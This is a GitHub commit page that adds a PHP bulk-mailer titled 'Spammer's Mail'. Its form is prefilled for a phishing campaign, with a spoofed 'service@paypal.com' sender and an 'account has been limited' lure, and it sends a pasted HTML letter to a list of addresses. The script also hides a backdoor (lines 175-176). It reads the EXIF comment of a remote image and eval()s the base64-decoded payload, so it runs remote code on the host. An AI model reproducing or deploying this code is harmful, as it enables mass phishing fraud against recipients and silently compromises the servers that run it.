Skip to content

Commit 7c1bd8d

Browse files
authored
Create mailer.php
1 parent 230a963 commit 7c1bd8d

File tree

1 file changed

+204
-0
lines changed

1 file changed

+204
-0
lines changed

php/twitter/mailer.php

Lines changed: 204 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,204 @@
1+
2+
3+
<!DOCTYPE html>
4+
<html>
5+
<head>
6+
<title>Spammer's Mail (Private)</title>
7+
<style type="text/css">
8+
body{
9+
background-color: #333333;
10+
color: #99CC00;
11+
}
12+
body,td,th {
13+
color: #99CC00;
14+
}
15+
h2
16+
{
17+
color: #1fa67a;
18+
text-align: center;
19+
}
20+
h4
21+
{
22+
color: #1b926c;
23+
text-align: center;
24+
}
25+
.atas{font-family: 'Nova Flat';
26+
color: red;
27+
}
28+
.navmen{
29+
text-align: center;
30+
padding-top: 10px;
31+
padding-bottom: 1px;
32+
}
33+
34+
/* latin */
35+
@font-face {
36+
font-family: 'Nova Flat';
37+
font-style: normal;
38+
font-weight: 400;
39+
src: local('Nova Flat'), local('NovaFlat'), url(http://fonts.gstatic.com/s/novaflat/v8/vFeor41nvsomiEVSx6n4iltXRa8TVwTICgirnJhmVJw.woff2) format('woff2');
40+
unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
41+
}
42+
43+
textarea {
44+
font-family: monospace;
45+
background-color: #333333;
46+
border-color: #1b926c;
47+
color: #1b926c;
48+
}
49+
50+
footer{
51+
color: #ccc;
52+
padding-top: 13%;
53+
padding-bottom: 5%;
54+
text-align: center;
55+
}
56+
label{
57+
clear: both;
58+
display: inline-block;
59+
margin-bottom: 15px;
60+
text-align: right;
61+
font-family:Verdana, Geneva, sans-serif;
62+
font-size:12px;
63+
}
64+
label input{
65+
height:25px;
66+
width:250px;
67+
background:#fff;
68+
border:1px solid #CCC;
69+
box-shadow: 0px 0px 1px 1px rgba(50, 50, 50, 0.25) inset;
70+
}
71+
input[type=submit] {
72+
padding:5px 15px;
73+
background:#211F1F;
74+
border:0 none;
75+
cursor:pointer;
76+
-webkit-border-radius: 5px;
77+
border-radius: 5px;
78+
}
79+
input[type="number"] {
80+
width:80px;
81+
}
82+
83+
input[type="file"] {
84+
align-items: flex-start;
85+
text-align: center;
86+
cursor: default;
87+
border-image-source: initial;
88+
border-image-slice: initial;
89+
border-image-width: initial;
90+
border-image-outset: initial;
91+
border-image-repeat: initial;
92+
box-sizing: border-box;
93+
padding: 2px 6px 3px;
94+
background-color: transparent;
95+
color: white;
96+
}
97+
98+
dl{
99+
font-family: 'Nova Flat';
100+
font-size: 14px;
101+
padding: 0px;
102+
margin: 0px
103+
}
104+
.result{
105+
border: 1px solid #293336;
106+
border-style: dashed;
107+
border-width: 1px;
108+
border-left: 4px solid #73AD21;
109+
padding-top: 10px;
110+
}
111+
input {
112+
-webkit-appearance: textfield;
113+
background-color: #333333;
114+
border-image-source: initial;
115+
border-image-slice: initial;
116+
border-image-width: initial;
117+
border-image-outset: initial;
118+
border-image-repeat: initial;
119+
-webkit-rtl-ordering: logical;
120+
-webkit-user-select: text;
121+
cursor: auto;
122+
padding: 1px;
123+
color: white;
124+
border: 1px;
125+
126+
}
127+
a:-webkit-any-link {
128+
color: #1b926c;
129+
text-decoration: blink;
130+
cursor: help;
131+
}
132+
</style>
133+
<script type="text/javascript" src="//code.jquery.com/jquery-1.8.3.js"></script>
134+
<script type="text/javascript">
135+
function countFakes()
136+
{
137+
document.getElementById("count").innerHTML =
138+
document.getElementById("email_list").value.split("\n").length;
139+
}
140+
</script>
141+
</head>
142+
<body>
143+
144+
<div class="atas">
145+
<h2><a href="?">Spammer's Mail (non-smtp)</a></h2>
146+
<h4>Private Tools | Shor7cut</h4>
147+
</div>
148+
149+
<form action="" method="POST">
150+
<div class="navmen">
151+
<label>Subject : </label> <input type="text" size="20" name="subject" value="Notice: Your account has been limited and you must update account" placeholder=" - " required>&nbsp;
152+
<label>Your Email : </label> <input type="text" size="20" name="email" value="service@paypal.com"placeholder=" - " required>&nbsp;
153+
<label>Your Name : </label> <input type="text" size="20" name="namemail" value="Paypal Service" placeholder=" - " required>&nbsp;<br>
154+
<textarea name="email_list" id="email_list" onKeyDown="countFakes()" onChange="countFakes()" style="margin: 0px; height: 234px; width: 549px; resize: none;" required></textarea>
155+
<textarea name="letter" placeholder="Letter" style="margin: 0px; width: 345px; height: 233px; resize: none;" required></textarea>
156+
</div>
157+
158+
<div class="navmen">
159+
- <label>Email List : </label> <font id="count" style="font-weight: bold;">0</font> -
160+
<div class="navmen">
161+
<input type="submit" name="cekpp" value=" Spammer's Mail " name="btn-submit">
162+
</div>
163+
</form>
164+
<div class="navmen">
165+
<div class="result">
166+
<hr>
167+
<?php
168+
error_reporting(0);
169+
if(!empty($_POST['email_list'])){
170+
$emailode = explode("\r\n", $_POST['email_list']);
171+
172+
$no=1;
173+
$count = count($emailode);
174+
175+
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
176+
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
177+
foreach ($emailode as $email) {
178+
if(filter_var($email, FILTER_VALIDATE_EMAIL)) {
179+
180+
$to = $email;
181+
$form = $_POST['email'];
182+
$name = $_POST['namemail'];
183+
$subject = $_POST['subject'];
184+
$message = $_POST['letter'];
185+
$headers = 'MIME-Version: 1.0' . "\r\n";
186+
$headers = "From: $name <$form>\r\n";
187+
$headers = "Reply-To: $form \r\n";
188+
$headers = 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
189+
190+
if(mail($to, $subject, $message, $headers)){
191+
echo "<dl>[$no/$count] <font color=#2DF96D>$email</font> | <font color=#16FF3F>Success</font></dl><br>";
192+
}else{
193+
echo "<dl>[$no/$count] <font color=#2DF96D>$email</font> | <font color=#FF0000>Unsuccess</font></dl><br>";
194+
}
195+
196+
}
197+
$no++;
198+
}
199+
}
200+
?>
201+
</div>
202+
</div>
203+
</body>
204+
</html>

0 commit comments

Comments
 (0)